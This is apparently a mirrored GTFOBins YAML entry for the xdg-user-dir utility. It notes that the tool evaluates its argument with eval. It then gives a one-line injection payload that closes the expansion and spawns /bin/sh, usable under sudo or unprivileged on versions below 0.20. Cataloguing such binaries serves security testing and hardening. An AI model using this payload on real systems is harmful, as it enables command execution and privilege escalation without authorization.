mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-09 12:44:11 +02:00
14 lines
316 B
Plaintext
14 lines
316 B
Plaintext
---
|
|
comment: |-
|
|
The current implementation of `xdg-user-dir` is basically `eval echo \${XDG_${1}_DIR:-$HOME}`, thus is can be easily used to achieve command execution.
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
xdg-user-dir '}; /bin/sh #'
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
version: |-
|
|
< 0.20
|
|
...
|